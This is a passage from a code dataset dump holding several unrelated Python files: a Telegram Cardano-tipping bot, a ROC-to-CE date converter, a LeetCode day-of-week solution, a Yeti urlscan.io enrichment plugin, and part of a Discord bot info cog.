utils.fmt_ada(data.get(\"fees\")),\n \"rewards\": utils.fmt_ada(data.get(\"rewards\")),\n \"utxo\": utils.fmt_ada(data.get(\"utxo\")),\n \"deposits\": utils.fmt_ada(data.get(\"deposits\")),\n }\n\n update.message.reply_html(html.reply(\"pots.html\", **template_args))\n\n @_setup_callback\n def netparams(self, update, context, html: HTMLReplies = HTMLReplies()):\n \"\"\"Get network parameters (/netparams).\"\"\"\n endpoint = \"netparams/\"\n url = os.path.join(self.base_url, endpoint)\n r = 
requests.get(url, headers=self.headers, params={\"currency_format\": \"ADA\"})\n        r.raise_for_status()  # captured by the _setup_callback decorator\n        data = r.json().get(\"data\", None)\n\n        template_args = {\n            \"a0\": data.get(\"a0\"),\n            \"min_pool_cost\": utils.fmt_ada(data.get(\"min_pool_cost\")),\n            \"min_utxo_value\": data.get(\"min_utxo_value\"),\n            \"n_opt\": data.get(\"n_opt\"),\n            \"rho\": data.get(\"rho\"),\n            \"tau\": data.get(\"tau\"),\n        }\n\n        update.message.reply_html(html.reply(\"netparams.html\", **template_args))\n\n    @_setup_callback\n    def netstats(self, update, context, html: HTMLReplies = HTMLReplies()):\n        \"\"\"Get network statistics (/netstats).\"\"\"\n        endpoint = \"netstats/\"\n        url = os.path.join(self.base_url, endpoint)\n        r = requests.get(url, headers=self.headers, params={\"currency_format\": \"ADA\"})\n        r.raise_for_status()  # captured by the _setup_callback decorator\n        data = r.json().get(\"data\", None)\n\n        template_args = {\n            \"ada_in_circulation\": utils.fmt_ada(data.get(\"ada_in_circulation\")),\n            \"percentage_in_stake\": data.get(\"percentage_in_stake\"),\n            \"stakepools\": data.get(\"stakepools\"),\n            \"delegations\": data.get(\"delegations\"),\n            \"load_15m\": data.get(\"load_15m\"),\n            \"load_1h\": data.get(\"load_1h\"),\n            \"load_24h\": data.get(\"load_24h\"),\n        }\n\n        update.message.reply_html(html.reply(\"netstats.html\", **template_args))\n\n    def _get_cardabot_user_id(self, chat_id: str | int) -> int:\n        \"\"\"Return the cardabot user id for the given chat_id.\n\n        If chat is not connected, return None.\n        \"\"\"\n        res = requests.get(\n            os.path.join(self.base_url, f\"chats/{chat_id}/\"),\n            headers=self.headers,\n            params={\"client_filter\": \"TELEGRAM\"},\n        )\n        res.raise_for_status()\n\n        return res.json().get(\"cardabot_user_id\", None)\n\n    def _get_cardabot_user_address(self, user_id: int) -> str:\n        \"\"\"Return the cardabot user address for the given user_id.\n        \"\"\"\n        res = requests.get(\n            os.path.join(self.base_url, f\"users/{user_id}/\"),\n            headers=self.headers,\n            params={\"client_filter\": \"TELEGRAM\"},\n        )\n        res.raise_for_status()\n\n        return res.json().get(\"stake_key\", None)\n\n\n    @_setup_callback\n    def connect(self, update, context, html: HTMLReplies = HTMLReplies()):\n        \"\"\"Connect user wallet\"\"\"\n        chat_id = update.effective_chat.id\n\n        # only allow private chats\n        if update.effective_chat.type != \"private\":\n            update.message.reply_html(html.reply(\"connection_refused.html\"))\n            return\n\n        ## Get token from chat_id\n        r = requests.get(\n            os.path.join(self.base_url, f\"chats/{chat_id}/token/\"),\n            headers=self.headers,\n            params={\"client_filter\": \"TELEGRAM\"},\n        )\n        r.raise_for_status()  # captured by the _setup_callback decorator\n        tmp_token = r.json().get(\"tmp_token\", None)\n\n        ## Create unique URL for user\n        cardabot_url = self.base_url.replace(\"api/\", \"\")\n        connect_url_link = f\"{cardabot_url}connect?token={tmp_token}\"\n\n        message = context.bot.send_message(\n            chat_id=chat_id,\n            text=f\"⬇️ Click the button below to connect your web wallet to CardaBot, so you can start tipping\",\n            reply_markup=InlineKeyboardMarkup(\n                [\n                    [\n                        InlineKeyboardButton(\n                            text=\"🔗 Connect Wallet\",\n                            url=connect_url_link,\n                        )\n                    ],\n                    [\n                        InlineKeyboardButton(\n                            text=\"📖 Learn more\",\n                            url=\"https://cardabot.app/faq/\",\n                        )\n                    ],\n                ]\n            ),\n        )\n\n        # task to run for a couple of minutes or until the user connects their wallet\n        def update_message(message, cardabot_user, chat_id, job_id):\n            cardabot_user_id = self._get_cardabot_user_id(chat_id)\n            if cardabot_user_id is not None:\n                stake_addr = self._get_cardabot_user_address(cardabot_user_id)  # fetch the address only once the wallet is connected\n                message.edit_text(\n                    html.reply(\"connection_success.html\", stake_address=stake_addr), parse_mode=\"HTML\"\n                )\n                utils.Scheduler.queue.remove_job(job_id)\n\n        start_date = datetime.now() + timedelta(seconds=20)\n        end_date = start_date + timedelta(seconds=7 * 60)\n        job_id = secrets.token_urlsafe(6)  # generate tmp id for the job\n        utils.Scheduler.queue.add_job(  # add job to scheduler\n            update_message,\n            \"interval\",\n            seconds=10,\n            start_date=start_date,\n            end_date=end_date,\n            args=[message, self._get_cardabot_user_id(chat_id), chat_id, job_id],\n            id=job_id,\n        )\n\n    def ebs(self, update, context) -> None:\n        update.message.reply_text(\n            \"🔔 Follow us on social media!\",\n            #\n            reply_markup=InlineKeyboardMarkup(\n                [\n                    [\n                        InlineKeyboardButton(\n                            text=\"✨ Twitter ✨\", url=\"https://twitter.com/EveryBlockStd\"\n                        )\n                    ],\n                    [\n                        InlineKeyboardButton(\n                            text=\"✨ Instagram ✨\",\n                            url=\"https://instagram.com/EveryBlockStudio\",\n                        )\n                    ],\n                    [\n                        InlineKeyboardButton(\n                            text=\"✨ LinkedIn ✨\",\n                            url=\"https://www.linkedin.com/company/everyblock-studio/\",\n                        )\n                    ],\n                    [\n                        InlineKeyboardButton(\n                            text=\"✨ Telegram ✨\",\n                            url=\"https://t.me/EveryBlockStudio\",\n                        )\n                    ],\n                    [\n                        InlineKeyboardButton(\n                            text=\"✨ Discord ✨\",\n                            url=\"https://discord.gg/dxNSXpvS9W\",\n                        )\n                    ],\n                ]\n            ),\n        )\n\n    def _get_network(self) -> str:\n        \"\"\"Return the network name\"\"\"\n        network = os.environ.get(\"NETWORK\", \"mainnet\").lower()\n        if network not in (\"mainnet\", \"testnet\"):\n            raise ValueError(\"Invalid network environment variable!\")\n\n        return network\n\n    @_setup_callback\n    def tip(self, update, context, html: HTMLReplies = HTMLReplies()):\n        \"\"\"Tip a user\"\"\"\n        if update.message.reply_to_message is None:\n            # only allow tip if msg is a response to a user\n            update.message.reply_html(html.reply(\"tip_refused.html\"))\n            return\n\n        txt = update.message.text.split()\n        lbound = utils.min_ada()\n        if not (len(txt) == 2 and utils.isnumber(txt[1]) and float(txt[1]) > lbound):\n            update.message.reply_html(html.reply(\"tip_refused.html\"))\n            return\n\n        # make sure to create chat_ids for recipient and sender\n        self.cardabotdb.get_or_create_chat(int(update.message.from_user.id))\n        self.cardabotdb.get_or_create_chat(int(update.message.reply_to_message.from_user.id))\n\n        # get data for building tx\n        data = {\n            \"chat_id_sender\": update.message.from_user.id,\n            \"chat_id_receiver\": update.message.reply_to_message.from_user.id,\n            \"username_receiver\": update.message.reply_to_message.from_user.username,\n            \"amount\": float(txt[1]),\n            \"client\": \"TELEGRAM\",\n        }\n\n        # call cardabot-api to build the tx (get tx_id)\n        r = requests.post(\n            os.path.join(self.base_url, \"unsignedtx/\"), headers=self.headers, data=data\n        )\n\n        # verify the tx response\n        if r.status_code >= 400:\n            message = update.message.reply_text(\n                r.json().get(\"detail\", None)\n            )  # TODO: improve this, should be an html reply\n            return\n\n        if r.status_code != 201:\n            update.message.reply_text(\"💰 Tip failed!\\n\\n\")\n            return\n\n        tx_id = r.json().get(\"tx_id\")\n        # create a link to sign the tx\n        cardabot_url = self.base_url.replace(\"api/\", \"\")\n        pay_url_link = f\"{cardabot_url}pay?tx_id={tx_id}\"\n\n        # create message with a button to send the tx\n        message = update.message.reply_text(\n            # chat_id=update.effective_chat.id,\n            text=\"⬇️ Click the button below to sign your transaction using your web wallet:\",\n            reply_markup=InlineKeyboardMarkup(\n                [\n                    [\n                        InlineKeyboardButton(\n                            text=\"🔑 
Sign Tx\",\n url=pay_url_link,\n )\n ],\n [\n InlineKeyboardButton(\n text=\"📖 Learn more\",\n url=\"https://cardabot.app/faq/\",\n )\n ],\n ]\n ),\n )\n\n # task to run for a couple of minutes or until the tx is submitted to network\n def update_message(message, tx_id, network, job_id, end_date):\n r = requests.get(\n os.path.join(self.base_url, f\"checktx/{tx_id}/\"),\n headers=self.headers,\n )\n\n if r.status_code != 200:\n if datetime.now() > end_date - timedelta(seconds=30):\n message.edit_text(\n text=html.reply(\"tip_fail.html\"), parse_mode=\"HTML\"\n )\n utils.Scheduler.queue.remove_job(job_id)\n return\n\n net = network + \".\" if network == \"testnet\" else \"\"\n message.edit_text(\n text=\"✅ Your transaction was submitted!\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Check Tx on CardanoScan\",\n url=f\"https://{net}cardanoscan.io/transaction/{tx_id}\",\n )\n ],\n ]\n ),\n )\n utils.Scheduler.queue.remove_job(job_id)\n\n start_date = datetime.now() + timedelta(seconds=1)\n end_date = start_date + timedelta(seconds=600)\n job_id = secrets.token_urlsafe(6) # generate tmp id for the job\n utils.Scheduler.queue.add_job( # add job to scheduler\n update_message,\n \"interval\",\n seconds=30,\n start_date=start_date,\n end_date=end_date,\n args=[message, tx_id, self._get_network(), job_id, end_date],\n id=job_id,\n )\n\n def _get_all_cardabot_chats(self) -> list[str]:\n \"\"\"Get all cardabot chats from database, excluding groups.\"\"\"\n r = requests.get(\n os.path.join(self.base_url, \"chats/\"),\n headers=self.headers,\n params={\"client_filter\": \"TELEGRAM\"},\n )\n r.raise_for_status()\n\n chat_ids = [\n chat.get(\"chat_id\") for chat in r.json() if int(chat.get(\"chat_id\")) > 0\n ] # exclude telegram group chats\n\n return chat_ids\n\n @_setup_callback\n def alert(self, update, context, html: HTMLReplies = HTMLReplies()):\n \"\"\"Send a message to all users.\"\"\"\n sender_chat_id = os.environ.get(\"ADMIN_CHAT_ID\")\n if str(update.effective_user.id) != sender_chat_id:\n update.message.reply_html(html.reply(\"endpoint_refused.html\"))\n return\n\n message = update.message.text.split(\" \", 1)[1]\n chat_ids = self._get_all_cardabot_chats()\n\n utils.send_to_all(bot=context.bot, chat_ids=chat_ids, text=message)\n\n def end_of_epoch_task(self, bot) -> None:\n \"\"\"Send of epoch summary to all users.\"\"\"\n html = HTMLReplies()\n endpoint = \"epochsummary/\"\n url = os.path.join(self.base_url, endpoint)\n r = requests.get(url, headers=self.headers, params={\"currency_format\": \"ADA\"})\n r.raise_for_status() # captured by the _setup_callback decorator\n data = r.json().get(\"data\", None)\n\n template_args = {\n \"epoch\": data.get(\"epoch\", None),\n \"blocks\": data.get(\"blocks\", None),\n \"txs\": data.get(\"txs\", None),\n \"fees\": utils.fmt_ada(data.get(\"fees\", None)),\n \"reserves\": utils.fmt_ada(data.get(\"reserves\", None)),\n \"treasury\": utils.fmt_ada(data.get(\"treasury\", None)),\n }\n\n message = html.reply(\"end_of_epoch_summary.html\", **template_args)\n chat_ids = self._get_all_cardabot_chats() #TODO: exclude users that have disabled the bot messages\n logging.info(\"Sending end of epoch summary message to: %s\", chat_ids)\n utils.send_to_all(bot=bot, chat_ids=chat_ids, text=message, parse_mode=\"HTML\")\n\n @_setup_callback\n def claim(self, update, context, html: HTMLReplies = HTMLReplies()):\n \"\"\"Claim user funds that are being held temporarily.\"\"\"\n update.message.reply_text(f\"⌛️ We're transfering your funds, 
please wait...\")\n\n chat_id = update.message.from_user.id\n r = requests.post(\n os.path.join(self.base_url, \"claim/\"),\n headers=self.headers,\n params={\"client_filter\": \"TELEGRAM\"},\n data={\"chat_id_receiver\": chat_id},\n )\n\n if r.status_code == 406 or r.status_code == 404:\n message = update.message.reply_text(\n r.json().get(\"detail\", None)\n ) # TODO: improve this, should be an html reply\n return\n else:\n r.raise_for_status()\n\n network = self._get_network()\n net = network + \".\" if network == \"testnet\" else \"\"\n update.message.reply_text(\n text=\"✅ Your funds were successfuly transfered to you!\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Check Tx on CardanoScan\",\n url=f\"https://{net}cardanoscan.io/transaction/{r.json().get('tx_id')}\",\n )\n ],\n ]\n ),\n )\n return\n\n @_setup_callback\n def balance(self, update, context, html: HTMLReplies = HTMLReplies()):\n \"\"\"Get user balance.\"\"\"\n chat_id = update.message.from_user.id\n\n r = requests.get(\n os.path.join(self.base_url, f\"chats/{chat_id}/balance/\"),\n headers=self.headers,\n params={\"client_filter\": \"TELEGRAM\"},\n )\n r.raise_for_status()\n\n update.message.reply_html(html.reply(\"chat_balance.html\", **r.json()))\n return\n","repo_name":"EveryBlockStudio/cardabot-telegram","sub_path":"cardabot_telegram/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":23569,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"40587169711","text":"\nfrom tkinter.tix import InputOnly\nfrom xml.sax import default_parser_list\nimport numpy as np\nimport pandas as pd\nimport re\nimport chardet\nfrom datetime import datetime\n\nclass DATin(object):\n\n def __init__(self, path, colname):\n self._path = path\n self._colname = colname # 日期的字段\n if self._path.endswith(\".csv\"):\n f = open(self._path, \"rb\") # 判断字元\n data = f.read()\n self.dfold = pd.read_csv(\n self._path, encoding=chardet.detect(data)[\"encoding\"])\n else:\n self.dfold = pd.read_excel(self._path, header=0, sheet_name=0)\n\n @property\n def path(self):\n return self._path\n\n @property\n def colname(self):\n return self._colname\n\n def df_origin(self):\n return self.dfold\n\n def pickup(self):\n \"\"\"取出日期列\"\"\"\n datlist = self.dfold[self._colname]\n iconlist = r\"[年月,/\\-\\.]\" # 用正则表达是,需要判别的符号\n datedf = pd.DataFrame(columns=['Year', 'Month', 'Day'])\n n = 0\n \"\"\" 先判别民国年OR西元年\"\"\"\n for i in datlist:\n YMD = [\"\", \"\", \"\"]\n i = str(i)\n \n try:\n # 判断是否可转为数字\n i = int(i)\n # 判断是否为excel 日期数字\n \n if i <60000 and i >30000:\n dt = datetime.fromordinal(datetime(1900, 1, 1).toordinal() + i - 2) \n tt = dt.timetuple()\n \n YMD= [str(tt.tm_year),str(tt.tm_mon),str(tt.tm_mday)]\n if len(YMD[1]) == 1:\n YMD[1] = \"0\"+YMD[1]\n if len(YMD[2]) == 1:\n YMD[2] = \"0\"+YMD[2]\n \n \n # 为单纯年月日的形式\n else:\n i = str(i)\n if int(i[0:2]) < 17:\n \"\"\"转换百位民国年(100年后)为西元年\"\"\"\n i = str(1911+int(i[0:3]))+i[3:]\n\n elif int(i[0:2]) > 21:\n \"\"\"转换十位民国年(99年前)为西元年\"\"\"\n i = str(1911+int(i[0:2]))+i[2:]\n \n YMD[0] = i[0:4]\n \n if len(i) == 8:\n YMD[1] = i[4:6]\n YMD[2] = i[6:]\n # 仅六码\n elif len(i) == 6:\n if int(i[4:6]) <= 12:\n YMD[1] = i[4:6]\n else:\n YMD[1] = \"0\"+i[4]\n YMD[2] = \"0\"+i[5]\n elif len(i) == 5:\n YMD[1] = \"0\"+i[4]\n # 有七码\n else:\n if i[4] != \"1\":\n YMD[1] = \"0\"+i[4]\n YMD[2] = i[5:7]\n else:\n # 无法判别时加上error\n YMD[1] = i[4:7]\n YMD[2] = \"error\"\n \n\n except:\n # 
dates with separator symbols ----------------------------------------------------------------------\n                # pre-convert: use the size of the first two digits to decide between CE and ROC years\n                if int(i[0:2]) < 17:\n                    \"\"\"Convert three-digit ROC years (100 onwards) to CE years\"\"\"\n                    i = str(1911+int(i[0:3]))+i[3:]\n\n                elif int(i[0:2]) > 21:\n                    \"\"\"Convert two-digit ROC years (99 and earlier) to CE years\"\"\"\n                    i = str(1911+int(i[0:2]))+i[2:]\n\n                \"\"\"Check whether there are separator symbols >>>> 年月日,/\\-.\"\"\"\n                if re.search(iconlist, i):\n                    i = re.sub(r\"[日]\", \"\", i)  # strip 日 first to avoid creating an extra empty field\n                    YMD = re.split(iconlist, i)\n                    if len(YMD) < 3:\n                        YMD.append(\"\")\n                    \"\"\"Build the day/month/year output\"\"\"\n                    \"\"\"Zero-pad single-digit months and days\"\"\"\n                    if len(YMD[1]) == 1:\n                        YMD[1] = \"0\"+YMD[1]\n                    if len(YMD[2]) == 1:\n                        YMD[2] = \"0\"+YMD[2]\n            \n            \n            datedf.loc[n, ] = YMD\n            \n            n += 1\n        # return the year/month/day dataframe\n        return datedf\n\n\nclass DATout(object):\n    def __init__(self, datadf, split_icon=\"\", yearform=\"西元年\"):\n        self._split_icon = split_icon\n        # the separator symbol\n        self._yearform = yearform\n        # year format, defaults to 西元年 (CE)\n        self._datadf = datadf\n        # the Year/Month/Day table produced by DATin\n        self.datelist = []\n\n    def combine(self):\n        for i in range(0, len(self._datadf)):\n            # convert when the format is ROC years\n            if self._yearform == \"民国年\":\n                self._datadf.loc[i, \"Year\"] = str(\n                    int(self._datadf.loc[i, \"Year\"])-1911)\n            # loop through each field and skip empty values when joining\n\n            if self._split_icon != \"年月日\":  # if the separator is an ordinary symbol, join the parts directly\n                # join with an if filter: fields that are empty are not added\n                combinelist = self._split_icon.join(\n                    t for t in self._datadf.loc[i] if t)\n\n            elif self._split_icon == \"年月日\":  # when joining with 年月日, build the string separately\n                if self._datadf.loc[i, \"Day\"]:  # skip the 日 part when the day is empty\n                    combinelist = self._datadf.loc[i, \"Year\"]+\"年\" + \\\n                        self._datadf.loc[i, \"Month\"]+\"月\" + \\\n                        self._datadf.loc[i, \"Day\"]+\"日\"\n                else:\n                    combinelist = self._datadf.loc[i, \"Year\"] + \\\n                        \"年\"+self._datadf.loc[i, \"Month\"]+\"月\"\n\n            self.datelist.append(combinelist)\n\n        return self.datelist\n\n\ndef main():\n    path = input(\"Enter the input file path: \")\n    colname = input(\"Name of the column holding the dates: \")\n    #path2 = input(\"Enter the output file path: \")\n    #yearform = input(\"民国年\")\n    #split_icon = input(\"/\")\n\n    date_c = DATin(path, colname)  # run DATin to build the converted data\n    date_output_form = DATout(date_c.pickup(), \"年月日\", \"民国年\")\n\n    date_output = date_c.df_origin()\n    date_output[colname] = date_output_form.combine()\n\n    date_output.to_excel(\"D:\\Desktop\\日期.xlsx\")\n\n\nif __name__ == '__main__':\n    main()\n# D:\\Desktop\\date_test.xlsx \n# date","repo_name":"dudunoyume/DATE","sub_path":"DATE.py","file_name":"DATE.py","file_ext":"py","file_size_in_byte":6795,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"73888429812","text":"class Solution:\n    def dayOfTheWeek(self, day: int, month: int, year: int) -> str:\n        def isleap(year):\n            if year % 4 != 0:\n                return False\n            elif year % 100 != 0:\n                return True\n            elif year % 400 != 0:\n                return False\n            else:\n                return True\n        daysinmonth = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n        daysinweek = [\"Sunday\", \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\"]\n        # 1971,1,1 - Friday\n        diff = 5\n        for y in range(1971, year):\n            if isleap(y): \n                diff += 366\n            else: \n                diff += 365\n        for m in range(0, month-1):\n            diff += daysinmonth[m]\n        if month >= 2 and isleap(year):\n            diff += 1\n        diff += day - 1\n        print(diff)\n        return daysinweek[diff % 7]\n\nif __name__ == '__main__':\n    s = Solution()\n    print(s.dayOfTheWeek(31, 8, 2019))  # sample date; prints \"Saturday\"","repo_name":"xiaofanc/leetcode","sub_path":"1185-day-of-the-week.py","file_name":"1185-day-of-the-week.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
+{"seq_id":"42344713323","text":"import json\nimport logging\n\nimport requests\n\nfrom core.analytics import OneShotAnalytics\nfrom core.config.config import yeti_config\nfrom core.errors import GenericYetiError, ObservableValidationError\nfrom core.observables import AutonomousSystem, Hostname, Ip, Text, Url\n\n\nclass UrlScanIoApi(object):\n \"\"\"\n https://urlscan.io/about-api/\n \"\"\"\n\n API_URL = \"https://urlscan.io/api/v1/search/\"\n\n @staticmethod\n def _process_asn_data(page, observable):\n links = set()\n if page[\"page\"].get(\"asn\"):\n asn = AutonomousSystem.get_or_create(\n value=page[\"page\"][\"asn\"].replace(\"AS\", \"\")\n )\n links.update(asn.active_link_to(observable, \"asn#\", \"UrlScanIo Query\"))\n\n if page[\"page\"].get(\"asnname\"):\n asnname = Text.get_or_create(value=page[\"page\"][\"asnname\"])\n links.update(\n asnname.active_link_to(\n observable, \"asn_name\", \"UrlScanIoQuerycanIo Query\"\n )\n )\n\n if page[\"page\"].get(\"server\"):\n server = Text.get_or_create(value=page[\"page\"][\"server\"])\n links.update(server.active_link_to(observable, \"server\", \"UrlScanIo Query\"))\n\n return list(links)\n\n @staticmethod\n def _process_data(json_result, observable):\n links = set()\n\n for page in json_result:\n if not page.get(\"page\"):\n continue\n\n # IP iocs has more data than the rest\n if not isinstance(observable, Ip) and page[\"page\"].get(\"ip\"):\n try:\n ip = page[\"page\"][\"ip\"]\n new_ip = Ip.get_or_create(value=ip)\n new_ip.add_context({\"source\": \"UrlScanIo\"})\n links.update(\n new_ip.active_link_to(observable, \"ip\", \"UrlScanIo Query\")\n )\n except ObservableValidationError:\n logging.error(\"This ip address is not valid %s\" % ip)\n\n if not isinstance(observable, Hostname) and page[\"page\"].get(\"domain\"):\n try:\n hostname = page[\"page\"][\"domain\"]\n new_host = Hostname.get_or_create(value=hostname)\n new_host.add_context({\"source\": \"UrlScanIo\"})\n links.update(\n new_host.active_link_to(\n observable, \"hostname\", \"UrlScanIo Query\"\n )\n )\n except ObservableValidationError:\n logging.error(\"This hostname not valid: %s\" % hostname)\n\n if not isinstance(observable, Url) and page[\"page\"].get(\"url\"):\n try:\n url = page[\"page\"][\"url\"]\n new_url = Url.get_or_create(value=url)\n new_url.add_context({\"source\": \"UrlScanIo\"})\n links.update(\n new_url.active_link_to(observable, \"url\", \"UrlScanIo Query\")\n )\n except ObservableValidationError:\n logging.error(\"This url is not valid %s\" % url)\n\n links.update(UrlScanIoApi._process_asn_data(page, observable))\n\n @staticmethod\n def fetch(observable):\n types = {\n \"ip\": 'ip:\"{}\"',\n \"hostname\": 'domain:\"{}\"',\n \"hash\": 'hash:\"{}\"',\n }\n\n params = {\"q\": types[observable.type].format(observable.value)}\n try:\n response = requests.get(\n UrlScanIoApi.API_URL, params=params, proxies=yeti_config.proxy\n )\n if not response.ok:\n raise GenericYetiError(\"Status code: \".format(response.status_code))\n\n if response.json().get(\"total\", 0) > 0:\n return response.json()[\"results\"]\n\n return None\n except Exception as e:\n raise GenericYetiError(\n \"Hit an error checking {},{}\".format(observable.value, e)\n )\n\n\nclass UrlScanIoQuery(OneShotAnalytics, UrlScanIoApi):\n default_values = {\n \"name\": \"UrlScanIo\",\n \"description\": \"Perform a UrlScanIo query.\",\n }\n # 'Url', url search doesn't work right now\n ACTS_ON = [\"Ip\", \"Hostname\", \"Hash\"]\n\n def analyze(self, observable, results):\n links = list()\n json_result = 
UrlScanIoApi.fetch(observable)\n\n        if json_result is not None:\n            json_string = json.dumps(\n                json_result, sort_keys=True, indent=4, separators=(\",\", \": \")\n            )\n            results.update(raw=json_string)\n            links = UrlScanIoApi._process_data(json_result, observable)\n            context = {\"raw\": json_string, \"source\": self.name}\n            observable.add_context(context)\n\n        return links\n","repo_name":"yeti-platform/yeti","sub_path":"plugins/analytics/public/urlscanio.py","file_name":"urlscanio.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","stars":1485,"dataset":"github-code","pt":"21"}
+{"seq_id":"34041019740","text":"import asyncio\nimport base64\nimport contextlib\nimport functools\nimport io\nimport itertools\nimport os\nimport random\nimport re\nimport secrets\nimport textwrap\nimport typing\nimport unicodedata\nfrom difflib import SequenceMatcher, get_close_matches\n\nimport async_tio\nimport discord\nimport emoji\nimport github\nfrom discord import app_commands\nfrom discord.app_commands import Choice\nfrom discord.ext import commands\nfrom discord.ext.commands.cooldowns import BucketType\nfrom jishaku.codeblocks import codeblock_converter\n\nimport utils\nfrom utils import fuzzy\n\n\nclass Info(commands.Cog):\n    \"Gives you Information about data you are allowed to access\"\n\n    def __init__(self, bot):\n        self.bot = bot\n\n    @commands.command(\n        help=\"gives you info about a guild\",\n        aliases=[\n            \"server_info\",\n            \"guild_fetch\",\n            \"guild_info\",\n            \"fetch_guild\",\n            \"guildinfo\",\n        ],\n    )\n    async def serverinfo(self, ctx, *, guild: typing.Optional[discord.Guild] = None):\n        guild = guild or ctx.guild\n\n        if guild is None:\n            await ctx.send(\"Could not find the guild you were looking for.\")\n\n        if guild:\n            embed = discord.Embed(title=f\"{guild}\", color=random.randint(0, 16777215), timestamp=ctx.message.created_at)\n            embed.set_thumbnail(url=guild.icon.url if guild.icon else \"https://i.imgur.com/3ZUrjUP.png\")\n\n            view = utils.GuildInfoView(ctx, guild)\n\n            await ctx.send(\n                \"Get More Information for the guild you selected\",\n                embed=embed,\n                view=view,\n            )\n\n    @commands.command(\n        aliases=[\"user_info\", \"user-info\", \"ui\", \"whois\"],\n        brief=\"a command that gives information on users\",\n        help=\"this can work with mentions, ids, usernames, and even full names.\",\n    )\n    async def userinfo(self, ctx, *, user: utils.SuperConverter = commands.Author):\n        embed = discord.Embed(title=f\"{user}\", color=random.randint(0, 16777215), timestamp=ctx.message.created_at)\n\n        embed.set_image(url=user.display_avatar.url)\n\n        view = utils.UserInfoSuper(ctx, user)\n\n        await ctx.send(\"Please note this is being upgraded to a cooler version (it is a bit broken right now)\")\n\n        await ctx.send(\n            \"Pick a way for Mutual Guilds to be sent to you, or not if you really don't want the mutual guilds\",\n            embed=embed,\n            view=view,\n        )\n\n    @app_commands.command(description=\"Get info about a user\", name=\"userinfo\")\n    async def userinfo_slash(\n        self, interaction: discord.Interaction, user: typing.Optional[typing.Union[discord.Member, discord.User]] = None\n    ):\n        user = user or interaction.user\n\n        if isinstance(user, discord.Member):\n            user = await self.bot.try_member(user.guild, user.id)\n\n        ctx = await self.bot.get_context(interaction)\n\n        embed = discord.Embed(title=f\"{user}\", color=random.randint(0, 16777215), timestamp=ctx.message.created_at)\n\n        embed.set_image(url=user.display_avatar.url)\n\n        view = utils.UserInfoSuper(ctx, user)\n\n        await ctx.send(\n            \"Pick a way 
for Mutual Guilds to be sent to you, or not if you really don't want the mutual guilds\",\n            embed=embed,\n            view=view,\n        )\n\n    @commands.command(brief=\"uploads your emojis into a Senarc Bin link\")\n    async def look_at(self, ctx):\n        if isinstance(ctx.message.channel, discord.TextChannel):\n            message_emojis = \"\"\n            for x in ctx.guild.emojis:\n                message_emojis = message_emojis + \" \" + str(x) + \"\\n\"\n\n            paste = await utils.post(self.bot, message_emojis)\n            await ctx.send(paste)\n\n        if isinstance(ctx.channel, discord.DMChannel):\n            await ctx.send(\"We can't use that in DMs as it takes emoji regex and puts it into a paste.\")\n\n    @commands.command(help=\"gives the id of the current guild or DM if you are in one.\")\n    async def guild_get(self, ctx):\n        if isinstance(ctx.channel, discord.TextChannel):\n            await ctx.send(content=ctx.guild.id)\n\n        if isinstance(ctx.channel, discord.DMChannel):\n            await ctx.send(ctx.channel.id)\n\n    @commands.command(brief=\"a command to tell you the channel id\", aliases=[\"GetChannelId\"])\n    async def this(self, ctx):\n        await ctx.send(ctx.channel.id)\n\n    @commands.command(brief=\"Gives you mention info, don't abuse (doesn't actually mention)\")\n    async def mention(self, ctx, *, user: utils.SuperConverter = commands.Author):\n        await ctx.send(\n            f\"Discord Mention: {user.mention} \\nRaw Mention: {discord.utils.escape_mentions(user.mention)}\",\n            allowed_mentions=discord.AllowedMentions.none(),\n        )\n\n    @commands.cooldown(1, 30, BucketType.user)\n    @commands.command(help=\"fetch invite details\")\n    async def fetch_invite(self, ctx, *invites: typing.Union[discord.Invite, str]):\n        if invites:\n            menu = utils.InviteInfoEmbed(invites, ctx=ctx, delete_after=True)\n            await menu.send()\n        if not invites:\n            await ctx.send(\"Please provide actual invites to grab\")\n            ctx.command.reset_cooldown(ctx)\n\n        if len(invites) > 50:\n            await ctx.send(\n                \"Reporting using more than 50 invites in this command. 
This is to prevent ratelimits with the api.\"\n            )\n\n            jdjg = await self.bot.try_user(168422909482762240)\n            await self.bot.support_webhook.send(\n                f\"{jdjg.mention}.\\n{ctx.author} causes a ratelimit issue with {len(invites)} invites\"\n            )\n\n    @commands.command(brief=\"gives info about a file\")\n    async def file(self, ctx):\n        if not ctx.message.attachments:\n            await ctx.send(ctx.message.attachments)\n            await ctx.send(\"no file submitted\")\n\n        if ctx.message.attachments:\n            embed = discord.Embed(title=\"Attachment info\", color=random.randint(0, 16777215))\n            for a in ctx.message.attachments:\n                embed.add_field(name=f\"ID: {a.id}\", value=f\"[{a.filename}]({a.url})\")\n            embed.set_footer(text=\"Check the url(s) to get a direct download.\")\n            await ctx.send(embed=embed, content=\"\\nThat's good\")\n\n    @commands.command(\n        brief=\"a command to get the avatar of a user\",\n        help=\"using the userinfo technology it now powers avatar grabbing.\",\n        aliases=[\"pfp\", \"av\"],\n    )\n    async def avatar(self, ctx, *, user: utils.SuperConverter = commands.Author):\n        embed = discord.Embed(color=random.randint(0, 16777215))\n        embed.set_author(name=f\"{user.name}'s avatar:\", icon_url=user.display_avatar.url)\n\n        embed.set_image(url=user.display_avatar.url)\n        embed.set_footer(text=f\"Requested by {ctx.author}\")\n        await ctx.send(embed=embed)\n\n    @commands.command(brief=\"this is a way to get the nearest channel.\")\n    async def find_channel(self, ctx, *, args=None):\n        if args is None:\n            await ctx.send(\"Please specify a channel\")\n\n        if args:\n            if isinstance(ctx.channel, discord.TextChannel):\n                channel = discord.utils.get(ctx.guild.channels, name=args)\n                if channel:\n                    await ctx.send(channel.mention)\n                if channel is None:\n                    await ctx.send(\"Unfortunately we haven't found anything\")\n\n            if isinstance(ctx.channel, discord.DMChannel):\n                